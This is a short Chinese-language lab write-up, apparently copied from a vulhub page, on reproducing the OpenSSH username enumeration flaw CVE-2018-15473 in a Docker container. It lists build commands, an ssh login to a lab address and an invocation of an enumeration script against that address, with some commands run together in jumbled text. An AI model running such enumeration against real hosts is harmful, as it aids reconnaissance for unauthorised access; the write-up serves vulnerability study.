OpenSSH ⽤户名枚举漏洞(CVE-2018-15473)
OpenSSH ⽤户名枚举漏洞(CVE-2018-15473)
OpenSSH 7.7前存在⼀个⽤户名枚举漏洞,通过该漏洞,攻击者可以判断某个⽤户名是否存在于⽬标主机中。
漏洞环境
执⾏如下命令,编译及启动⼀个运⾏OpenSSH 7.7p1的容器:
环境启动后,我们在客户端执⾏,输⼊密码,即可登录到容器中。漏洞复现
使⽤,枚举字典中的⽤户名:
参考docker-compose build
docker-compose up -d
ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null root@172.168.30.190 -p20022vulhub python3 sshUsernameEnumExploit.py --port 20022 -- 172.168.3
0.190
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。
发表评论